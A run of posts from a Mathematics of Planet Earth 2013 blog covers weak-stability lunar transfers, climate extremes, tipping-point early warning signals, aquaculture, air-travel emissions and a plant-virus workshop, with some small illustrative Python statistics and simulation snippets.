    In 1991, this methodology was put to the test when the author found a new route to the Moon to rescue the Japanese spacecraft, Hiten, which successfully arrived there in October of that year (Figure 1). This route was a more practical 5 months in duration and actually required the more complex four-body model of the Earth, Moon, Sun and spacecraft. This route had to make use of not only the weak stability boundary of the Moon for ballistic capture, but also the weak stability boundary of the Earth due to the Earth and Sun gravitational interaction, which occurs about 1.5 million kilometers from the Earth. The spacecraft got to the Moon in ballistic capture by first flying out 4 times the Earth-Moon distance to 1.5 million kilometers, then falling back to the Moon for ballistic capture. This type of route, called an exterior Weak Stability Boundary (WSB) transfer, was used by NASA’s GRAIL mission in 2011. The original 2-year ballistic capture transfer was used by the European mission SMART-1 in 2004. There are plans to use them for many more space missions in the future.

    Figure 1. Hiten spacecraft

    These ballistic capture transfers are also referred to as low-energy transfers since less energy is used in the capture process. Since the capture occurs in the weak stability boundary, they are also referred to as WSB transfers, or more simply as weak transfers. When a spacecraft is moving in the weak stability boundary for capture, it is roughly analogous to a surfer catching a wave.

    In 2005, the author and J.R. Gott III published a different application of weak transfer: explaining where the giant Mars-sized impactor came from that is hypothesized to have collided with the Earth, forming the Moon from the remnants of the collision. The mechanism is called the Theia Hypothesis, after the hypothesized impactor, Theia. The idea is that Theia could have formed at one of the equilateral Lagrange points of the Earth-Sun system, two locations on the Earth’s orbit about the Sun, 60 degrees ahead of and behind the Earth (Figure 2). These locations are stable: a particle of negligible mass placed there remains trapped. The hypothesis is that Theia formed by accretion of many small rocks, called planetesimals, over millions of years. As Theia grew, it gradually moved away from the Lagrange point location where it was weakly captured, eventually escaping onto a weak transfer from the Lagrange region and hitting the Earth with low energy. NASA investigated this theory in 2009, when it sent its two STEREO spacecraft to these regions to look for residual material. Since the spacecraft were not originally designed to look for this type of material, their search was inconclusive.

    Figure 2. The five Lagrange points, L1, L2, L3, L4, L5

    A very interesting application of weak transfer to the origin of life on Earth was recently published by the author, Amaya Moro-Martin, Renu Malhotra and Dmitry Savransky (BMMS) in 2012 in the journal Astrobiology. They considered a special type of cluster of stars, called an open star cluster, which is a loose aggregate of stars moving slowly with respect to each other with relative velocities of about one kilometer per second. It is thought by many that the Sun formed in such a cluster about 5 billion years ago. They were trying to understand the validity of the Lithopanspermia Hypothesis. This hypothesis is that rocks containing biogenic material were ejected from the planetary system of a given star, S1, and captured by another star, for example the Sun. Eventually, some of the rocks would crash onto the Earth. Previous studies of this problem dealt with high-velocity ejection of rocks from S1, on the order of 6 kilometers per second. They found that the probability of capture of these rocks by another star, for example the Sun, was negligible, being essentially zero. The study by BMMS, taking 8 years, utilized very low-velocity escape from S1, on the order of 50 meters per second, and examined the likelihood of weak capture by the Sun. They found that the probability increased by roughly a factor of one billion! This implies that about 3 billion rocks could have impacted the Earth over the time spans considered, about 400 million years. The time spans involved coincided nicely with the emergence of life on Earth.

    Last, we mention that the weak stability boundary is a very interesting region about one of the mass points in, for example, the planar circular restricted three-body problem. An interesting result on the properties of this region was published by F. Garcia and Gerard Gomez in 2005. This was further studied by the author, Marian Gidea and Francesco Topputo in several publications since 2005, where this boundary, say about the Moon, is shown to be a subset of a very complex region consisting of invariant manifolds associated with the collinear Lagrange points L1 and L2 (Figure 3).

    Figure 3. Slice of weak stability boundary (red boundary region) about the Moon at center.

    Edward Belbruno
    Department of Astrophysical Sciences
    Princeton University

    Posted in Transportation | 1 Comment

    Is Natural Gas Clean?

    There is an interesting opinion article in this Wednesday’s New York Times, “Is natural gas `clean’?” by Mark Bittman. He argues that yes, it is cleaner than coal – it produces 50% less carbon dioxide than coal when burned – but it is still not clean. And, importantly, the methane that can escape into the atmosphere during any part of the harvesting of natural gas is a far worse greenhouse gas than the carbon dioxide from burning coal. If more than 3% escapes, then we’re actually better off just burning coal. But no one actually knows how much is lost in total from all the wells. Measuring and monitoring the amount that escapes is difficult and costly. Might that money be better spent developing the infrastructure for truly clean energy such as solar and wind?

    The links in this article are really good. Be sure to follow the Boston one. And I look forward to watching the new series “Years of living dangerously” that Bittman has been a part of. You can read Mark Bittman’s article here.

    Posted in Energy, Sustainability | Leave a comment

    Statistics of Extreme Events

    The floods that occurred earlier this month in Colorado remind us once again of the increasing talk about extreme weather events. This discussion has been going on for some time in the media, starting perhaps with the European heat wave of 2003, and has continued to this day—the Russian heat wave of 2010; the floods in Pakistan in 2012; and the enormous storm named Sandy that hit the Atlantic coast of the U.S. in 2012.

    We hear in the media that the rain storms that hit Colorado this year are the worst since 1893. Are such extreme weather events becoming more common? If so, to what extent can they be attributed to climate change?

    As Richard Smith, Director of the Statistical and Applied Mathematical Sciences Institute (SAMSI), pointed out in a recent talk, these are not simple questions to answer, but statistical analysis is making progress on ways to address them.

    While Smith points out that there is empirical evidence that extreme events are becoming more frequent, there is no universal agreement that this is due to climate change or anthropogenic contributions. And quantifying how frequent extreme events may become in the future, regardless of their causes, remains an active area of research.

    Smith offers some possible approaches to developing techniques for answering these questions, combining extreme value theory with hierarchical models. Details on these techniques may be found in his talk.
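
    To give a flavor of the extreme-value ingredient, the sketch below fits a Generalized Extreme Value (GEV) distribution to annual maxima of a synthetic daily rainfall series and reads off a 100-year return level. The data are artificial and the code is only a minimal illustration of the block-maxima approach; the hierarchical modeling layer discussed by Smith is not included.

      import numpy as np
      from scipy.stats import genextreme

      rng = np.random.default_rng(0)
      daily_rain = rng.gamma(shape=0.8, scale=8.0, size=(50, 365))   # 50 synthetic "years" of daily rainfall
      annual_max = daily_rain.max(axis=1)                            # block maxima (one value per year)

      # Fit the GEV distribution; scipy's shape parameter c corresponds to -xi in the usual convention.
      c, loc, scale = genextreme.fit(annual_max)

      # 100-year return level: the annual maximum exceeded on average once per century.
      level_100 = genextreme.ppf(1.0 - 1.0 / 100.0, c, loc=loc, scale=scale)
      print(f"shape={c:.3f}, location={loc:.1f}, scale={scale:.1f}, 100-year level={level_100:.1f}")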

    This talk was one of several in a minisymposium on Inference in Climate Studies. Audio recordings, synchronized with the slides, are available for listening/viewing.

    Together these talks show some of the research in the mathematical and statistical sciences on climate studies. Some of these are also part of a larger field of research, known to mathematicians as uncertainty quantification, whose goal it is to better quantify errors in large-scale computational models.

    Posted in Climate, Extreme Events, Statistics, Weather | Leave a comment

    Scientific Research on Sustainability and Its Impact on Policy and Management

    I recently had the opportunity to lecture on “Aquaculture and Sustainability of Coastal Ecosystems” at the NSF-funded Mathematical Biosciences Institute (MBI) in Columbus, Ohio. The MBI focuses on different theme programs; in the fall of 2013 the theme program is Ecosystem Dynamics and Management. In my lecture, I focused on work done over the last 10 years, with graduate students and colleagues, on disease transfer between aquaculture and wild salmon. This turns out to be a key issue for the sustainability of wild salmon, particularly pink salmon, in coastal ecosystems.

    Our work investigates the dynamics of parasite spill-over and spill-back between wild salmon and aquaculture. It employs mathematical methods, such as dynamical systems and differential equations, to analyze the biological processes. It also involves large amounts of data collected by field researchers on wild and domestic salmon parasites. Over the years, the work has received a great deal of scientific and public scrutiny. Our results, showing how aquaculture can impact wild salmon populations, have been enthusiastically endorsed by some and criticized by others. However, the work has reached policy makers and the general public, and we believe that it can make, and has made, a difference in how we manage aquaculture. A reflection on how scientific research can impact policy and decision making is given in the new book Bioeconomics of Invasive Species: Integrating Ecology, Economics, Policy and Management. The reference is:

    Keller, R.P., Lewis, M.A., Lodge, D.M., Shogren, J.F., and Krkošek, M. Putting bioeconomic research into practice. In: R.P. Keller, D.M. Lodge, M.A. Lewis and J.F. Shogren (eds.), Bioeconomics of Invasive Species: Integrating Ecology, Economics and Management (Ch. 13, pp. 266-284). Oxford University Press.

    The lecture has been recorded and can be viewed here.

    Mark Lewis
    University of Alberta
    mark.lewis@ualberta.ca

    Posted in Ecology, Resource Management, Sustainability | Leave a comment

    ICMS Workshop: Early Warning Signs of Tipping

    In a previous post, Kaitlin gave a great overview of the recent ICMS Tipping Points workshop. Today we will continue that conversation with a detailed look at efforts to understand and detect early warning signs of tipping.

    Mathematical framework

    Three mathematical mechanisms for tipping have been developed:

    • B-tipping: there is an abrupt transition between alternative steady states that occurs due to a bifurcation.
    • N-tipping: a rare noise event drives a transition between bistable states.
    • R-tipping: a system parameter is varied too rapidly, causing trajectories to depart from the dynamics of the static bifurcation diagram.

    A simple example of B-tipping occurs in the Stommel box model for ocean convection [2]. By increasing a freshwater forcing parameter in that model, one can force a rapid transition between thermally driven and salinity-driven ocean states. Here, the transition occurs due to a saddle-node bifurcation. This turns out to be a relatively generic mechanism that is often used as the prototypical example of B-tipping: after the bifurcation point is crossed, trajectories depart the formerly stable state for some alternative stable state in such a way that the change is irreversible.
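
    A minimal numerical sketch of this fold structure uses the normal form dx/dt = mu + x - x^3 as a stand-in for the forced box model, with the parameter mu playing the role of the freshwater forcing; all values below are illustrative.

      import numpy as np

      def equilibria(mu):
          """Real equilibria of dx/dt = mu + x - x**3 for a fixed parameter value mu."""
          roots = np.roots([-1.0, 0.0, 1.0, mu])           # coefficients of -x^3 + x + mu
          return np.sort(roots[np.abs(roots.imag) < 1e-6].real)

      # For |mu| below the fold value 2/(3*sqrt(3)) ~ 0.385 there are two stable states
      # separated by an unstable one; past the fold only one state survives, so a slowly
      # increased mu produces an abrupt, hysteretic jump.
      for mu in (0.0, 0.3, 0.5):
          print(f"mu = {mu}: equilibria {equilibria(mu)}")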

    N-tipping occurs when a system exhibits bistability and there is sufficient variability in the system’s state, presumably due to noise imposed on the system, that trajectories are pushed from one equilibrium to another. The noise, perhaps a large magnitude rare event, must push the system’s state out of an equilibrium’s basin of attraction and into that of another. For this reason, the size of an equilibrium’s basin of attraction is a fundamental measure of a system’s resilience.

    The last framework, R-tipping, depends on the rate at which a parameter varies with time. Even in a system where a single equilibrium is stable for every fixed value of a parameter, trajectories can be thrown onto large excursions in phase space (due to excitability or other mechanisms) when the parameter is varied faster than a critical rate. This mechanism may occur in peatland ecosystems, which are susceptible to excitability in the form of combustion.
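
    A minimal sketch of rate-induced tipping, using a standard prototype from the dynamical-systems literature rather than the peatland model itself: dx/dt = (x + lambda(t))^2 - 1 with lambda ramped at rate r. For every fixed lambda there is a stable state at x = -lambda - 1, yet trajectories fail to track it once r exceeds the critical rate r = 1.

      import numpy as np
      from scipy.integrate import solve_ivp

      def rhs(t, x, r):
          lam = r * t                      # linearly ramped parameter
          return (x + lam)**2 - 1.0

      def blow_up(t, x, r):
          return (x[0] + r * t) - 5.0      # fires once the trajectory has left the moving equilibria behind
      blow_up.terminal = True

      for r in (0.5, 0.9, 1.1, 1.5):
          sol = solve_ivp(rhs, (0.0, 20.0), [-1.0], args=(r,), events=blow_up, max_step=0.05)
          tipped = sol.status == 1         # integration stopped by the blow-up event
          print(f"r = {r}: {'tips' if tipped else 'tracks the moving equilibrium'}")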

    In this report we focus on B- and N-tipping, though R-tipping is developed thoroughly by Wieczorek et al. in a paper describing the compost bomb instability [3].

    Early Warning Signs

    Is it possible to predict tipping in advance? Surprisingly, the answer is “yes” for many systems that can undergo B-tipping. The best known precursor results from the effect of critical slowing down on a weakly noisy signal. For systems with a deterministic component and a stochastic component (introduced perhaps as a stand-in for dynamics that happen on a fast time scale), statistical characteristics of the noise in the resulting output may change approaching a bifurcation.

    Take a deterministic system with a saddle-node bifurcation as an example. A stable state of the system is characterized by the pull toward it, captured by the eigenvalues of the linearized system; these eigenvalues have negative real part. Approaching a bifurcation point by varying a parameter, one of these eigenvalues approaches zero. The pull of the system in the corresponding eigendirection diminishes, and so perturbations to the steady state close to the bifurcation point take increasingly long to return. Noise can be thought of, roughly, as repeated perturbations of the deterministic system. We expect that far from the bifurcation point such perturbations will quickly die down to the steady state. Close to the bifurcation, though, noise can push the system appreciably away from its steady state. If the noise is regular and satisfies some modest criteria [4], then one would expect the noise (relative to the deterministic signal) to become more correlated and more volatile approaching the saddle-node bifurcation. Thus, given certain criteria, one would expect to see signals in the autocorrelation function of the noise and in the variance of the noise as a system approaches a bifurcation point.
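
    The sketch below illustrates this numerically: an Euler-Maruyama simulation of dx = (mu(t) + x - x^3) dt + sigma dW with the parameter slowly ramped toward (but not past) the fold, followed by sliding-window variance and lag-1 autocorrelation of the mean-detrended signal. All parameter values are illustrative, and the crude detrending could be replaced by a proper trend removal.

      import numpy as np

      rng = np.random.default_rng(1)
      dt, sigma, n_steps = 0.02, 0.05, 100_000
      mu = np.linspace(-0.4, 0.35, n_steps)          # slow ramp toward the fold near 0.385

      x = np.empty(n_steps)
      x[0] = -1.0                                    # start on the lower stable branch
      for i in range(n_steps - 1):
          drift = mu[i] + x[i] - x[i]**3
          x[i + 1] = x[i] + drift * dt + sigma * np.sqrt(dt) * rng.standard_normal()

      def indicators(series, window=10_000):
          """Sliding-window variance and lag-1 autocorrelation of the mean-detrended signal."""
          var, ac1 = [], []
          for start in range(0, len(series) - window, window // 2):
              w = series[start:start + window]
              w = w - w.mean()
              var.append(w.var())
              ac1.append(np.corrcoef(w[:-1], w[1:])[0, 1])
          return np.array(var), np.array(ac1)

      var, ac1 = indicators(x)
      print("variance:", var.round(5))               # both indicators rise along the ramp
      print("lag-1 autocorrelation:", ac1.round(3))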

    Intrinsic noise occurs in many natural systems, and given that the underlying dynamics of a system roughly satisfy the criteria of critical slowing-down methods, one may search for increased autocorrelation and variance in noise from real data. One source of data that may be conducive to this kind of analysis is the paleoclimate proxy record. These proxies are correspondences between strongly correlated variables within the climate, like correspondences between oxygen isotope ratios (which can be observed in ice-core records) and past temperature. If one were to assume that there was some strongly deterministic signal in the proxies recording Dansgaard-Oeschger events, then the noise about this signal could be analyzed for increased correlation and variance. Dakos et al. do this for a number of proxy records, and find increased autocorrelation signals approaching what appear to be abrupt transitions [5].

    This sort of analysis may provide a test of critical slowing-down methods, as abrupt transitions can be readily observed in these records. However, it is unclear whether these transitions constitute what we characterize as tipping. It is possible that dynamics were such that a small change of parameters had a large impact on the system state, but in a reversible way. In this case, no bifurcation occurs. Rather, there is a single steady state that is stable throughout the transition.

    Figure from [4].

    Since the rate of change of the steady state with respect to the parameter is steep, one may also expect to see some of the same hallmarks of critical slowing down that one would see with a bifurcation. Though in either hypothesis the state of the system is strongly affected, the existence of a bifurcation may imply bistability and hysteresis, and therefore some degree of irreversibility. By comparison, an abrupt transition that is brought on by a steep response curve should be reversible.

    Another caveat is that in many cases, the size of a steady state’s basin of attraction decreases approaching the bifurcation point. When there is bistability, noise can more easily push the trajectory of a system out of the basin of one steady state and into another. A transition that happens this way is considered N-tipping. N-tipping transitions depend on a rare event in the noise process causing the system to transition between bistable states. For this reason, prediction in this case is difficult. N-tipping near a bifurcation point presents an important limitation in the use of critical slowing down as an early warning sign. Critical slowing down cannot necessarily give information about when a transition will occur, but simply that it can occur. This, though perhaps unsatisfying, is still useful. If one can identify aspects of the climate that bear the hallmarks of critical slowing down, then measures can be taken to reverse the direction of change to avoid catastrophic transition.

    Figure from [6]

    While these signals are generic in the sense that they may appear wherever the generic saddle-node bifurcation mechanism occurs, many have cautioned against using these indicators without some understanding of the underlying dynamics. In particular, one must avoid the prosecutor’s fallacy, which in probabilistic terms means that $P(A|B)$ ≠ $P(B|A)$ unless $P(A)$ = $P(B)$. In the context of early warning signs, we can think of $A$ as “the occurrence of B-tipping” and $B$ as “the appearance of early warning signs”. Simply put, observing a warning sign does not imply that B-tipping is occurring! It is important to formulate a mathematical model because a model can be analyzed, criticized, and modified. This is key to a sound hypothesis about what is observed in data. If the model is consistent with a bifurcation-induced transition, then this lends credence to the hypothesis that increased correlation and variance herald tipping.
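
    A toy calculation, with entirely hypothetical numbers, makes the point concrete: even a fairly reliable indicator yields a modest posterior probability of genuine B-tipping if tipping itself is rare.

      p_tipping = 0.02     # assumed prior probability that a record segment precedes tipping
      p_warn_tip = 0.80    # assumed P(warning sign | tipping), the indicator's sensitivity
      p_warn_no = 0.10     # assumed P(warning sign | no tipping), the false-positive rate

      p_warning = p_warn_tip * p_tipping + p_warn_no * (1 - p_tipping)
      p_tip_given_warning = p_warn_tip * p_tipping / p_warning

      print(f"P(warning | tipping) = {p_warn_tip:.2f}")
      print(f"P(tipping | warning) = {p_tip_given_warning:.2f}")   # about 0.14 with these numbers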

    Early warning signs derived from critical slowing down offer promise as broadly applicable tests for a natural system’s resilience to change and proximity to abrupt transition. They are certainly not foolproof: in addition to the pitfalls listed above, one must be careful to verify that the noise satisfies certain statistical properties and that the results are significant (which requires a sufficiently large number of observations). It has been shown that lag-1 autocorrelation used in conjunction with variance minimizes Type I and Type II errors in controlled settings [7]. With some additional modeling, it may be possible to develop even more precise indicators for a specific system.

    References:

      [1] “Tipping points: fundamentals and applications.” International Centre for Mathematical Sciences, n.d. Web. 16 Sept. 2013.
      [2] Stommel, H. (1961). Thermohaline convection with two stable regimes of flow. Tellus, 13(2), 224–230.
      [3] Wieczorek, S., et al. (2011). Excitability in ramped systems: the compost-bomb instability. Proceedings of the Royal Society A: Mathematical, Physical and Engineering Sciences, 467(2129), 1243–1269.
      [4] Scheffer, M., et al. (2009). Early-warning signals for critical transitions. Nature, 461, 53–59.
      [5] Dakos, V., et al. (2008). Slowing down as an early warning signal for abrupt climate change. Proceedings of the National Academy of Sciences of the USA, 105(38), 14308–14312.
      [6] Ditlevsen, P. D., & Johnsen, S. J. (2010). Tipping points: early warning and wishful thinking. Geophysical Research Letters, 37(19). doi:10.1029/2010GL044486.
      [7] Beaulieu, C. Early warning signals for critical transitions: sense, sensitivity and specificity. Invited talk, ICMS Tipping Points: Fundamentals and Applications, 12 Sept. 2013.

    Karna Gowda
    Northwestern University

    Posted in Complex Systems, Mathematics, Tipping Phenomena | 1 Comment

    Musings on Summer Travel

    Thanks to the affordability of air travel nowadays, an increasing number of us have the opportunity to visit exotic locations around the globe. Back in my student days, I was enthralled by the idea of attending conferences in cultural centers like Paris and Edinburgh, as well as remote villages like Les Houches in the French Alps, or Cargèse in Corsica. The idea of pitching a tent next to the beach and spending a week learning about the latest developments in theoretical physics made me feel like I was the luckiest person in the world. Back then I didn’t think twice about the unintended consequences of my travels, but now that the scientific case for anthropogenic global warming (AGW) is firmly established, we scientists can no longer ignore the externalities of our summer gatherings.

    A comprehensive analysis of the evolution of the scientific consensus on AGW was published recently in Environmental Research Letters [1]. Out of 11,944 abstracts in the peer-reviewed scientific literature over the last 21 years, the study identified more than 4,000 that stated a position on the cause of global warming. Of these, 97% endorsed the view that human activity is the unambiguous cause of such trends. The study found that “the number of papers rejecting the consensus on AGW is a vanishingly small proportion of the published research.”

    Unfortunately, the degree of consensus within the academic community is poorly represented in the popular media, and there continues to be a widespread public perception that climate scientists disagree about the significance of human activity in driving these changes. Indeed, a 2012 poll showed that although an increasing number of Americans believe there is now solid evidence indicating global warming, more than half still either disagree with, or are otherwise unaware of, the consensus among scientists that human activity is the root cause of this increase [2].

    The ability to implement effective climate policy is noticeably impaired by the public’s confusion over the position of climate scientists. In the Pew Research Center’s annual policy priorities survey, just 28% said that dealing with global warming should be a top priority, ranking climate policy last amongst the 21 priorities tested [3].

    Since becoming involved with MPE2013, I’ve tried to develop a better understanding of the work of climate scientists, as well as the economic and technological challenges we must face to meet future energy demands. Although many of my colleagues share similar concerns about the urgency of addressing AGW, very few have made any significant changes to their personal/professional life choices. As members of the academic community, we work in an intellectual milieu that exposes us to trends and ideas far ahead of their widespread adoption; just think of our use of information technology and the Web. But various lunchtime conversations on the topic soon made me realize how difficult it will be to bring about the kind of awareness necessary to meet the challenges of global issues like climate change, even amongst the educated elite. On this point I must say that I’m personally grateful to everyone who has worked so hard to make MPE2013 a success.

    Before last year I’d never estimated my carbon footprint, let alone compared it to those of my friends and colleagues from abroad. But after attending an MPE planning meeting, I started following MPE2013 activities, and some of the topics kindled a sense of personal responsibility quite beyond the usual intellectual curiosity I might feel for other disciplines. I hope one of the legacies of MPE2013 will be an influx of new talent into the wide range of intricate mathematical problems highlighted in the lectures, workshops and conferences currently taking place around the world.

    But I also hope that many more of us will take note of a science that connects us back to the world in which we live, and a greater personal awareness of the energy choices we make in our lives. So if you’ve never taken the time before, I think you might enjoy playing with one of the various carbon calculators available on the Web. The US Environmental Protection Agency has one on its web site, and National Geographic has a personal “energy meter” that is both educational and easy to share with your neighbors and friends. You might be surprised to see how you measure up to your non-academic peers. Are you part of the energy avant-garde, or lagging the national average? How you fare may crucially depend on whether you frequently visit international colleagues, or have a penchant for traveling abroad to conferences and workshops. In an article on January 26 this year, the New York Times suggested “your biggest carbon sin may be air travel”. Have you ever purchased carbon credits to offset your flights, or would you consider declining an invitation to a professional meeting to reduce your score? Some airlines and several of the popular online travel agencies offer the opportunity to purchase offsets when you buy your air tickets. If you haven’t adopted any such scheme, you are not alone; indeed, you are in good company! As reported in the January New York Times article cited above:

      Last fall, when Democrats and Republicans seemed unable to agree on anything, one bill glided through Congress with broad bipartisan support and won a quick signature from President Obama: the European Union Emissions Trading Scheme Prohibition Act of 2011. This odd law essentially forbids United States airlines from participating in the European Union Emissions Trading System, Europe’s somewhat lonely attempt to rein in planet-warming emissions.

    Under this program, the aviation sector was next in line to join other industries in Europe and start paying for emissions generated by flights into and out of EU destinations. After an uproar from both governments and airlines, as well as a slew of lawsuits from the United States, India and China, the European Commission delayed full implementation for one year to allow an alternative global plan to emerge.

    But already back in 2007, the most contentious matter on the agenda of the 36th Assembly of the International Civil Aviation Organization (ICAO) was the environmental impact of international aviation. Stratospheric ozone depletion and poor air quality at ground level are also effects of aircraft emissions, and although the Kyoto Protocol of 1997 assigned the ICAO the task of reducing the impact of aircraft engine emissions, so far the organization has resisted measures that would impose mandatory fuel taxes or emissions standards.

    This set the stage for a legal dispute of gargantuan proportions between the ICAO’s European member countries and foreign airlines and governments who do not want to comply. The ICAO’s general assembly meets once every three years, and the 38th Assembly is due to begin next week on September 24. The hottest topic on the agenda is sure to be the pending EU legislation and the need to find common ground on aviation emissions standards and trading, but what position will the United States, India and China now adopt?

    In his 2013 Inaugural Address, President Obama promised to make dealing with climate change part of his second-term agenda. The volume of air travel is increasing much faster than gains in fuel efficiency, even as emissions from many other sectors are falling. The meetings taking place at the ICAO assembly next week could be some of the most significant in the fight against AGW this year, but will our government finally take the lead in bringing about the kind of binding legislation our planet so desperately needs?

    References:

    [1] John Cook et al., 2013 Environ. Res. Lett. 8 024024
    [2] More Say There Is Solid Evidence of Global Warming – Pew Research Center – Monday, October 4-7, 2012
    [3] Climate Change: Key Data Points from Pew Research – Monday, June 24, 2013

    David Alexandre Ellwood
    davidalexandreellwood@gmail.com

    Posted in General, Transportation | Leave a comment

    Math for Weather, Bacteria, Aircraft

    In the September issue of the Notices of the AMS is a book review of Invisible in the Storm: The Role of Mathematics in Understanding Weather by Ian Roulstone and John Norbury. The review is by Peter Lynch. The book is a history of the development of mathematical models for weather prediction and, at least from the review, it sounds like a valuable source for non-mathematicians and mathematicians alike. You can read the review here.

    There have also been two items recently highlighted by the AMS in their “Mathematical Sciences on the Newswires” section that are of particular interest to the MPE2013 community. Both were published in Science Daily. The first is the article “Simple Math Sheds New Light On a Long-Studied Biological Process”, and it focuses on some very simple mathematics that surprisingly helps explain the adaptation of bacteria.

    The other story is “Stabilizing Aircraft During Takeoff and Landing Using Math” and again emphasizes that the right mathematical model provides insight into the design features of aircraft and helps tune them for optimum stability.

    Estelle Basor
    American Institute of Mathematics

    Posted in Biology, Mathematics, Weather | Leave a comment

    Vector Transmission of Plant Viruses

    Plant Virus

    Photo Credit: Howard F. Schwartz, Bugwood.org

    One of the greatest limiting factors in modern agriculture is plant viruses. Climate change and the emergence of new viral strains affect the health and biodiversity of crops and of plants in general, while the continued growth of the human population emphasizes the need for sustainable agriculture.

    In terms of conservation and biodiversity, a significant number of invasion events around the world have been associated with the presence of pathogens. Invasion success depends on the increased relative fitness of the invader as compared to the native species. A classic example is the Barley/Cereal Yellow Dwarf Virus (B/CYDV), introduced by annual grasses, which has accompanied their massive invasion of native perennial grasslands in western Oregon and California. B/CYDV in the United States, African Cassava Mosaic Virus and others require a deeper study of plant physiology and epidemiology in crop models and economic models, as well as a better understanding of the effects of climate change and of control measures to curtail economic losses.

    Mathematical, statistical and computational methods can contribute to problems in vector transmission of plant viruses. Areas to focus on include the impact of climate change on plants, vectors and viral transmission; the environmental determinants of plant growth, such as temperature, timing and soil nutrients; the effect of plant genetics on viral persistence; the effect of vector dispersal and behavior on pathogen transmission; and the effect of other factors, such as co-infection, on transmission.

    The problems in vector transmission of plant viruses are multi-scale and highly dependent on environmental variables. Thus, multidisciplinary teams with expertise in biology and mathematics are needed to solve these problems.
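
    As a minimal illustration of the kind of model such teams might start from, the sketch below couples a susceptible/infected plant population to a susceptible/infected vector population with mass-action transmission. The structure and every parameter value are generic assumptions for illustration, not a model taken from the workshop.

      from scipy.integrate import solve_ivp

      def plant_vector(t, y, beta_pv=0.002, beta_vp=0.002, rogue=0.05, mu_v=0.1, birth_v=15.0):
          S_p, I_p, S_v, I_v = y
          new_plant_inf = beta_pv * S_p * I_v     # infectious vectors infect susceptible plants
          new_vector_inf = beta_vp * S_v * I_p    # vectors acquire the virus from infected plants
          dS_p = -new_plant_inf + rogue * I_p     # rogueing/replanting returns hosts to the susceptible pool
          dI_p = new_plant_inf - rogue * I_p
          dS_v = birth_v - new_vector_inf - mu_v * S_v
          dI_v = new_vector_inf - mu_v * I_v
          return [dS_p, dI_p, dS_v, dI_v]

      # 100 susceptible plants, 1 infected plant, 150 uninfected vectors, no infected vectors.
      sol = solve_ivp(plant_vector, (0.0, 365.0), [100.0, 1.0, 150.0, 0.0])
      print("infected plants after one season:", round(sol.y[1, -1], 1))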

    In March, the National Institute for Mathematical and Biological Synthesis (NIMBioS) will host an Investigative Workshop on Vectored Plant Viruses, which will provide a forum for discussion of current problems on vectored transmission of plant viruses, with the goal of identifying mathematical, computational, and statistical methods, as well as insights derived using these methods.

    This workshop will bring together experts in plant pathogens, agronomy, and vector and plant virology, physiology, and ecology with mathematical and statistical modelers to discuss problems in prevention and control of vector transmission of plant pathogens. It is expected that the workshop will lead to new collaborations and working groups on methods for prevention and control of vector transmission of plant viruses, which promote sustainable agricultural practices and reduce species invasions.

    Co-organizing the workshop are Linda J. S. Allen (Mathematics and Statistics, Texas Tech Univ., Lubbock); Vrushali A. Bokil (Mathematics, Oregon State Univ., Corvallis); Elizabeth T. Borer (Ecology & Evolutionary Biology, Univ. of Minnesota, Minneapolis); Alison G. Power (Ecology & Evolutionary Biology, Cornell Univ., Ithaca, NY); and Frank Van Den Bosch (Computational and Systems Biology, Rothamsted Research, Hertfordshire, UK).

    If you have an interest in these topics, the workshop is still accepting applications. The application deadline is Oct. 28, 2013. Individuals with a strong interest in the topic, including post-docs and graduate students, are encouraged to apply. Click here for more information and on-line registration.

    NIMBioS Investigative Workshops focus on broad topics or a set of related topics, summarizing/synthesizing the state of the art and identifying future directions. Organizers and key invited researchers make up approximately one half of the 30-40 participants in a workshop, and the remaining 15-20 places are filled through open application from the scientific community. If needed, NIMBioS can provide support (travel, meals, lodging) for workshop attendees.

    Posted in Biodiversity, Climate Change, Workshop Announcement | Leave a comment

    MPE-themed Issue of “Nieuw Archief voor Wiskunde”

    What is a wave attractor? How can we “see” below the Earth’s surface while staying above ground? And what does desertification have to do with balloons?

    These and other topics are discussed in the September 2013 issue of the Nieuw Archief voor Wiskunde (NAW, translated as “New Archive for Mathematics”), the quarterly journal of the Royal Mathematical Society (KWG) of the Netherlands. The NAW is aimed at a broad audience: anyone professionally involved in mathematics, whether as an academic or industrial researcher, student, teacher, journalist or decision maker.

    The September 2013 issue of the NAW is dedicated to Mathematics of Planet Earth (MPE) and contains 11 articles and two interviews revolving around the MPE theme. Topics vary from phytoplankton to lightning and from El Niño to sand banks. The articles become freely available online one year after publication. Most of the articles are in Dutch, and for those readers who do not speak Dutch or who want to read about these topics now rather than later, I will give a brief overview of the articles. In most cases, further information and relevant research papers can be found on the authors’ Web sites.

    The MPE-themed issue of NAW starts with an article by Alef Sterk (University of Twente), Renato Vitolo (University of Exeter, UK) and Henk Broer (University of Groningen) about extreme-value statistics for deterministic dynamical systems. The classical theory of extreme values concerns random variables. Recently, researchers have started to investigate statistics of extremes in dynamical systems with chaotic behavior. This topic is relevant for the study of meteorological extremes, as many atmosphere models can be regarded as (highly complex) dynamical systems.

    In the next article, Arnold Heemink (TU Delft) and Peter Jan van Leeuwen (University of Reading, UK) review the most important current data assimilation methods. Among atmosphere and ocean scientists, data assimilation is the technique for systematically combining models and observations. It is an important aspect, for example, of operational weather prediction. Modern data assimilation methods build on ideas from optimal control and filter theory, and the development of these methods is a very active area of research where both mathematicians and atmosphere and ocean scientists are involved.
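
    The core idea can be seen in a single scalar update: weight the model forecast and the observation by their respective uncertainties. The sketch below is the textbook scalar Kalman analysis step with made-up numbers; operational schemes (variational methods, ensemble Kalman filters, particle filters) generalize the same update to enormous state vectors.

      def analysis(forecast, forecast_var, obs, obs_var):
          """Combine a scalar forecast and observation, weighted by their error variances."""
          gain = forecast_var / (forecast_var + obs_var)   # Kalman gain
          state = forecast + gain * (obs - forecast)       # the innovation pulls the forecast toward the data
          var = (1.0 - gain) * forecast_var                # the analysis is more certain than either input
          return state, var

      # Hypothetical numbers: the model predicts 15.0 C (error variance 4.0),
      # while a station reports 13.0 C (error variance 1.0).
      state, var = analysis(15.0, 4.0, 13.0, 1.0)
      print(state, var)   # 13.4 and 0.8: closer to the more trustworthy observation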

    Internal waves are waves below the surface of a lake or ocean. They are caused by density stratification and rotation of the Earth and behave very differently from free surface waves. This is related to the non-separability of the wave equation, as explained by Theo Gerkema and Leo Maas (NIOZ, Netherlands Institute for Ocean Research). In many water basins with sloping boundaries, the internal waves can get “caught” (or focused) in specific locations, forming a so-called wave attractor.

